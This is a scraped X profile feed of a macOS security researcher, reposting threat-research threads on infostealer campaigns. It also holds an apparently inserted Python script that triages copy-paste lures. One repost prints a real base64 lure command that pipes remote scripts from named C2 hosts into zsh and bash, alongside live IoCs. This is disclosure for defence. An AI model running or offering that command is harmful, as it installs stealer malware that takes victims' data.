Stuart Ashenbrenner 🇺🇸 🇨🇦

7.2K posts
@stuartjash

Principal macOS Security Researcher at @HuntressLabs | Creator of @Crash_Security | Reviewer at @bestthrillbooks | @MillennialGirlDad on @SubstackInc | 🏀

Portland, OR · Joined March 2016
1.4K Following · 1.6K Followers
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Anton (@BigToni94):
New AMOS campaign details. Attackers are using a phishing page hosted on sites.google.com, tricking users into executing a malicious command in Terminal: hxxps://api-metrics-5453[.]com/curl/3e97b0eddfddb28e10008f9348381b2665e1ad12476315b24a64808696c3347b The bash script downloads and launches the next-stage stager: “helper”. “helper” is a heavily obfuscated loader/dropper. It does not steal data directly, but prepares and launches the next stage (AMOS stealer + backdoor). The rest you already know. Infrastructure: api-metrics-5453[.]com — first stage prismdata48[.]com — Phishing site solidlattice65[.]com — Phishing site #AMOS #STEALER #macOS #malware #detection
0 replies · 12 reposts · 40 likes · 2.4K views
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Brandon Dalton (@PartyD0lphin):
Spent some time with Claude this weekend making an Endpoint Security reference for research and development. Checks for the latest SDK, parses the ES headers, and publishes. Includes a dedicated ES change log and telemetry matrix. esapi.swiftlydetecting.com
3 replies · 13 reposts · 25 likes · 4.1K views
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
DefSecSentinel (@DefSecSentinel):
🧵 The axios @npmjs compromise dropped a @macOS backdoor that closely mirrors North Korea's (@DPRK) recent WAVESHAPER backdoor. Let's take a quick look at the full intrusion:
13 replies · 116 reposts · 437 likes · 81K views
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Patrick Wardle (@patrickwardle):
You can now build macOS firewalls/network tools via Endpoint Security - no Network Ext. needed! 🤯 Reversing macOS 24.6’s new ES_EVENT_TYPE_RESERVED_* ES events shows some are network auth/notify hooks Read: “Building a Firewall…via Endpoint Security!?” objective-see.org/blog/blog_0x86…
4 replies · 65 reposts · 398 likes · 46.5K views
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Ferdous Saljooki (@malwarezoo):
In macOS Tahoe 26.4 Apple added a new security feature to Terminal that warns users of potentially malicious pastes with a "Possible malware, Paste blocked" prompt. Here's how it actually works 🧵
14 replies · 95 reposts · 749 likes · 113K views
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Thomas Reed (@thomasareed):
I've exited from tech and am doing guided tours in and around Yellowstone. backroadsbear.com Thanks to everyone for some great years! This will be my last post here. 🐬
4 replies · 3 reposts · 21 likes · 1.4K views
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Renzon (@r3nzsec):
DFIR analysts who use macOS as their daily driver deserve free and native forensic tooling. So I built one. 🍎 Introducing IRFlow Timeline — a timeline analysis app built from the ground up for Mac-based DFIR folks, forensic investigators, or SOC analysts. Built in appreciation of, and inspired by, Eric Zimmerman's Timeline Explorer. Every feature in this tool was shaped by real IR casework. Handling massive timelines, parsing artifacts here and there, and pivoting across logs during active investigations. I built IRFlow Timeline to be the native macOS timeline analyzer that actually keeps up with a live case. Every button and view is intentional; if it's in the app, it's because I needed it mid-case and realized the standard tools fell short. No dependencies. Zero setup. Just drag, drop, and analyze. #dfir #incidentresponse #timeline #macos #threathunting #digitalforensics
20 replies · 118 reposts · 504 likes · 39.3K views
Stuart Ashenbrenner 🇺🇸 🇨🇦
Apple dropping some XProtect updates (v5331) which seem to be every couple of Tuesdays. The new YARA rules which look at some AMOS stealers are really interesting in that they're looking at the assembly instructions, and the script-based stuff continues to move into XPScripts.yr.
0 replies · 1 repost · 15 likes · 600 views
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Who said what? (@g0njxa):
Hunting for macOS malware🍎with @osint_barbie revealed how threat actors are now leveraging different malware solutions at the same time on the same payload, in this case MacSync Stealer + Phexia Botnet for persistence. Malicious @evernote results with fake installation guides are being sponsored on Google for common searches like homebrew, leading the user to copy-paste and run a malicious command (image 1): lite.evernote[.]com/note/c548d6e8-22e3-d45c-b0d2-2ac5ecbd8964

As usual, the payload is base64 encoded: echo 'ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlIHBsZWFzZSB3YWl0Li4uJzsgY3VybCAta2ZzU0wgaHR0cDovL29udGFyaW9xdWFsaXR5Y2VkYXIuY29tL2N1cmwvYTBlZDBiZjg4MTY0YjA5NTYwZjM1ODQ2MjI3MWM2YTZlNzFkMjYxMWRiNjNkODVlYmFhZTkwYjI0OWJlOWYyOCB8IHpzaDsgY3VybCAta2ZzU0wgaHR0cDovLzEzOC4xMjQuMTguOS92IHwgYmFzaA==' | base64 -D | zsh

Decoded: curl -kfsSL http://ontarioqualitycedar[.]com/curl/a0ed0bf88164b09560f358462271c6a6e71d2611db63d85ebaae90b249be9f28 | zsh; curl -kfsSL http://138.124.18.9/v and we can already observe the two different malware solutions being leveraged.

1. MacSync Stealer
As usual, the URL http://ontarioqualitycedar[.]com/curl/a0ed0bf88164b09560f358462271c6a6e71d2611db63d85ebaae90b249be9f28 will provide a bash script with b64 + gunzip encoding, in charge of fetching the infostealer AppleScript, executing it and uploading the victim log to the C2 (image 2). There is not really much new here compared to what has been seen before, just that now the MacSync script uploads the log by splitting the file into 10 MB chunks, probably to avoid data loss in big logs. MacSync bash script -> f5a3fcc5f5d4754d7262f55ac0a4519af15f93bba847e986a1660820bad1caef

2. Phexia Botnet
The interesting part of this post is that a second payload is being executed sequentially as part of a different malware solution to create persistence on the infected macOS machine. From C2 138.124.18.9/v, a b64-encoded AppleScript is fetched.
In this case, it creates LaunchAgent persistence using a plist in ~/Library/LaunchAgents/com.bashsrc.ixxjeiijvivzovon.plist with b64 AppleScript content. This second payload, nothing far from what has been seen before, is responsible for fetching a Phexia Botnet live C2 from t[.]me/phefuckxiabot or, if that fails, hardcoded values (kys[.]cx and kys[.]li), then grabbing and executing the Phexia Botnet AppleScript, which manages to grab specs from the machine and waits until a task is loaded to be executed on the infected machine (image 3). Phexia AppleScript -> 618bff4f4d090ff802d8009dc97a89723757bd179e5cab069fb33c5ec7de61c2

Sponsored results are being paid for by different, likely compromised, advertisers (image 4). Transparency users - AR01249564419160014849, AR13446608053252128769, AR06288543453827563521, AR03671228110637891585. By analysing the advertisers, you can already see other active ads sponsoring other malicious Evernote results for macOS applications or fake command solutions for Transmission, OnyX, Rectangle, Final Cut Pro, PearCleaner, DropOver, 7zip, Flush DNS, NTFS, AppCleaner, OBS, CrossOver, Unarchiver, Open Source Office, Microsoft Office or VLC Player, among others.
1 reply · 23 reposts · 131 likes · 11.7K views
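A small triage helper for the pasted one-liner pattern described in the post above (an added example, not g0njxa's code): it flags base64-decoded text or curl output piped straight into a shell, decodes the embedded base64 layer, and defangs any URLs it finds so they can be pasted into a ticket. The sample command and its hosts are constructed placeholders, not the real indicators from the post.

```python
import base64
import re

# Constructed sample modelled on the "echo '<b64>' | base64 -D | zsh" lure.
# Hosts are placeholders (example.invalid / TEST-NET), not the post's IoCs.
INNER = ("echo 'Installing package please wait...'; "
         "curl -kfsSL http://stage1.example.invalid/curl/abc123 | zsh; "
         "curl -kfsSL http://203.0.113.9/v | bash")
SAMPLE_ONELINER = ("echo '" + base64.b64encode(INNER.encode()).decode()
                   + "' | base64 -D | zsh")

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
DECODE_TO_SHELL = re.compile(r"base64\s+(-D|-d|--decode)\s*\|\s*(zsh|bash|sh)\b")
CURL_TO_SHELL = re.compile(r"curl\s+[^|;]*\|\s*(zsh|bash|sh)\b")
URL = re.compile(r"https?://[^\s'\";|]+")


def defang(url: str) -> str:
    """Make a URL non-clickable (hxxp, [.]) for reports and tickets."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def decode_payloads(cmd: str) -> list[str]:
    """Decode every long base64-looking token that yields printable text.

    Hex hashes in URL paths also match the token regex; they decode to
    binary noise and are dropped by the printable-text check.
    """
    out = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\n\t" for c in text):
            out.append(text)
    return out


def triage(cmd: str) -> dict:
    """Summarise why a pasted one-liner looks like a copy-paste lure."""
    layers = [cmd] + decode_payloads(cmd)  # raw command plus decoded layers
    findings = []
    if DECODE_TO_SHELL.search(cmd):
        findings.append("base64-decoded text piped straight into a shell")
    urls = []
    for layer in layers:
        if CURL_TO_SHELL.search(layer):
            findings.append("curl output piped into a shell (remote stager)")
        urls += URL.findall(layer)
    return {"suspicious": bool(findings), "findings": sorted(set(findings)),
            "decoded": layers[1:], "urls": [defang(u) for u in urls]}
```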
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Moonlock Lab (@moonlock_lab):
1/ We’re tracking a fresh wave of #Odyssey #Stealer activity targeting #macOS users. Over the past days, our telemetry showed newly updated samples spreading primarily across: 🇺🇸 United States 🇫🇷 France 🇪🇸 Spain Today, the picture has clearly changed: the same Odyssey campaign is now affecting users in additional regions, including: 🇬🇧 United Kingdom 🇩🇪 Germany 🇮🇹 Italy 🇨🇦 Canada 🇧🇷 Brazil 🇮🇳 India 🌏Multiple countries across Africa and Asia Two map screenshots, taken only one day apart, highlight a rapidly expanding geographic footprint. Odyssey stealer samples in this campaign appear to be auto-generated, producing many unique hashes with the same size and functionality. See IOCs in the next one below👇
1 reply · 6 reposts · 29 likes · 1.9K views
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
L0Psec (@L0Psec):
This is an important update to osascript detection on macOS. As @howardnoakley stated, 12 rules were added including one for compiled osascript. These rules appear to provide coverage for many of the common infostealers we see targeting macOS. Let's take a look at a couple🧵
Quoting Howard Oakley, Eclectic Light Co (@howardnoakley): Apple has released an update to XProtect for all macOS eclecticlight.co/2026/02/03/app… via @howardnoakley
1 reply · 4 reposts · 32 likes · 3.1K views
Moonlock Lab (@moonlock_lab):
@malwrhunterteam An interesting one, thanks for sharing here! According to internals, looks like Odyssey stealer.
1 reply · 1 repost · 5 likes · 1.6K views
MalwareHunterTeam (@malwrhunterteam):
"Neuravision.dmg": ea6f39158671ff940a94c433c354e7d27b885ca2d57ce205f87e47f17f934055 🤷‍♂️
1 reply · 1 repost · 13 likes · 2.6K views
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Moonlock Lab (@moonlock_lab):
1/ After Mosyle shared details of the macOS malware campaign dubbed #SimpleStealth (reported by @arinwaichulis 9to5mac.com/2026/01/09/mos…), spreading via a fake @grok app, we took a closer look at the sample and found it attempting to terminate macOS security and monitoring tools🧵
2 replies · 6 reposts · 21 likes · 1.9K views
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Thijs Xhaflaire (@txhaflaire):
Are you using Visual Studio Code? Then this new blog from Jamf Threat Labs might have some takeaways for you! In this blog, we’ll shed light on newer techniques being used by DPRK-linked threat actors related to Contagious Interview, including a newly observed backdoor component. jamf.com/blog/threat-ac… #malware #git #macos #ThreatHunting #jamf
1 reply · 9 reposts · 20 likes · 2K views
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Jonny Johnson (@JonnyJohnson_):
@stuartjash, Chris Ryan, and I have the incredible opportunity/privilege of helping build the @HuntressLabs EDR products. Although we all work on a different OS for these products, one thing we try to drive for our customers is parity. That comes with a handful of challenges, as one might imagine. Today, the 3 of us are dropping a blog that goes over the desire to chase parity across these products. Blog: huntress.com/blog/pursuing-… Note: Expect to see more blogs like this this year. We are driving some really cool features that can replicate across different operating systems.
1 reply · 4 reposts · 12 likes · 1.4K views
Stuart Ashenbrenner 🇺🇸 🇨🇦 reposted
Objective-See Foundation (@objective_see):
🎉 A decade of Mac malware research 🎉 Just published our 10th annual “The Mac Malware of <year>” report ...2025 edition! For each new sample of 2025, covers: 🔎 IoCs 💉 Infection 💾 Persistence 📡 Capabilities ☣️ Samples for download Dive in 👇 objective-see.org/blog/blog_0x84…
2 replies · 22 reposts · 79 likes · 25.2K views